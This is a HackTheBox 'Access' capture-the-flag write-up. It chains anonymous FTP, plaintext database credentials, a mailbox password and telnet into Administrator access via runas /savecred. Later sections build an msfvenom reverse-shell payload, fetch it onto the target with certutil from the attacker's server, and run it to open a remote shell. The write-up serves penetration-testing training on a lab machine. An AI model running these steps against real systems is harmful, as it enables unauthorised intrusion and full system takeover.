HackTheBox - Access

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #windows #msfvenom #mdbtools #pst-utils

A Windows machine where anonymous FTP access begins a credential chain — through a database file, an email archive, and a telnet session — ending with stored administrator credentials ready to leverage.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ target=10.129.10.234; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-16 10:46 EST
Nmap scan report for 10.129.10.234
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info: 
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.84 seconds

Foothold

The web server didn’t expose anything useful.

FTP enumeration

Anonymous FTP login is allowed. The FTP root contains two directories: Backups and Engineer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~]
└─$ ftp 10.129.10.234
Connected to 10.129.10.234.
220 Microsoft FTP Service
Name (10.129.10.234:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
150 Opening ASCII mode data connection.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> exit
221 Goodbye.

Two files were discovered on the FTP server:

  • Engineer/Access Control.zip
  • Backups/backup.mdb

Downloading backup.mdb was unreliable due to network interruption, but Access Control.zip downloaded successfully.

1
2
3
4
ftp> cd Engineer
ftp> ls
08-24-18  12:16AM                10870 Access Control.zip
ftp> get Access\ Control.zip

To reliably retrieve the database, lftp was used with passive mode disabled and retries enabled:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ rm -f backup.mdb
lftp -u anonymous,anonymous ftp://10.129.10.234 -e "
set ftp:passive-mode false;
set ftp:use-epsv false;
set net:timeout 20;
set net:max-retries 20;
cd /Backups;
get -c backup.mdb;
bye"

ftp:use-epsv: no such variable. Use `set -a' to look at all variables.
cd ok, cwd=/Backups                  
5652480 bytes transferred in 21 seconds (262.0 KiB/s)

Extract credentials from backup.mdb

backup.mdb is a Microsoft Access database. Using mdbtools, the auth_user table revealed credentials for three users.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ mdb-tables -1 backup.mdb                    

<-SNIP->
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
<-SNIP->

$ mdb-export backup.mdb auth_user 
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Decrypt and extract Access Control.zip

Access Control.zip is password protected. The engineer password (access4u@security) successfully extracted a PST file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ 7z x -p'access4u@security' 'Access Control.zip'

7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
 64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

Everything is Ok

Size:       271360

$ ls
'Access Control.pst'

The archive contained Access Control.pst (an Outlook Personal Storage Table).

Read mailbox contents from the PST

The PST was converted into an MBOX file:

1
2
3
4
5
$ mkdir -p pst_out
$ readpst -o pst_out "Access Control.pst"
$ cd pst_out
$ ls
'Access Control.mbox'

The MBOX file was reviewed:

1
$ less Access\ Control.mbox

The mailbox contained the following text:

1
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Telnet access

Since telnet is open on port 23, the credentials security:4Cc3ssC0ntr0ller were used to log in.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ telnet 10.129.10.234 23
Trying 10.129.10.234...
Connected to 10.129.10.234.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

Login was successful.

Privilege Escalation

Find stored administrator credentials

While enumerating the filesystem as security, an interesting shortcut was found on the Public desktop:

1
2
3
4
5
C:\Users\security\Desktop>for /d %G in (C:\Users\*) do @echo ==== %G ==== & @dir /s /b "%G" 2>nul

<-SNIP->
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk
<-SNIP->

The .lnk file content was viewed directly:

1
2
3
4
5
6
7
8
9
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows���:�▒M�:*wWindowsV1MV�System32���:�▒MV�*�System32▒X2P�:�
                                                                                                           runas.exe���:1��:1�*Yrunas.exe▒L-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
               �wN�▒�]N�D.��Q���`�Xaccess�_���8{E�3
                                                   O�j)�H���
                                                            )ΰ[�_���8{E�3
                                                                         O�j)�H���
                                                                                  )ΰ[�  ��1SPS��XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500

From this output, the key information extracted was:

1
2
C:\Windows\System32\runas.exe user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico

This indicates runas.exe is used with /savecred to run Access.exe as ACCESS\Administrator.

Checking stored credentials confirmed the presence of cached administrator creds:

1
2
3
4
5
6
7
8
9
C:\Users>runas /list

C:\Users>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

This suggests runas with /savecred can be used to execute commands as ACCESS\Administrator.

Verify admin execution with runas

A quick validation wrote whoami output into C:\Temp\whoami_admin.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\Users>runas /user:ACCESS\Administrator /savecred "cmd /c whoami > C:\Temp\whoami_admin.txt"

C:\Users>dir C:\Temp
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Temp

02/16/2026  06:07 PM    <DIR>          .
02/16/2026  06:07 PM    <DIR>          ..
08/21/2018  10:25 PM    <DIR>          logs
08/21/2018  10:25 PM    <DIR>          scripts
08/21/2018  10:25 PM    <DIR>          sqlsource
02/16/2026  06:07 PM                22 whoami_admin.txt
               1 File(s)             22 bytes
               5 Dir(s)   3,346,440,192 bytes free

C:\Users>type C:\Temp\whoami_admin.txt
access\administrator

Gain a reverse shell as Administrator

A Windows x64 reverse shell payload was generated with msfvenom:

1
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.103 LPORT=1234 -f exe > shell.exe

The payload was hosted via a Python HTTP server:

1
2
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the target, certutil fetched the payload into C:\Temp\shell.exe:

1
2
3
4
5
C:\Users>certutil -urlcache -split -f http://10.10.16.103/shell.exe C:\Temp\shell.exe
****  Online  ****
  0000  ...
  1e00
CertUtil: -URLCache command completed successfully.

A listener was started:

1
$ nc -lnvp 1234

The payload was executed as ACCESS\Administrator using the stored credentials:

1
C:\Users>runas /user:ACCESS\Administrator /savecred "C:\Temp\shell.exe"

This produced a shell on the listener. The session landed in C:\Windows\system32>:

1
2
3
4
5
6
7
$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.16.103] from (UNKNOWN) [10.129.10.234] 49167
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>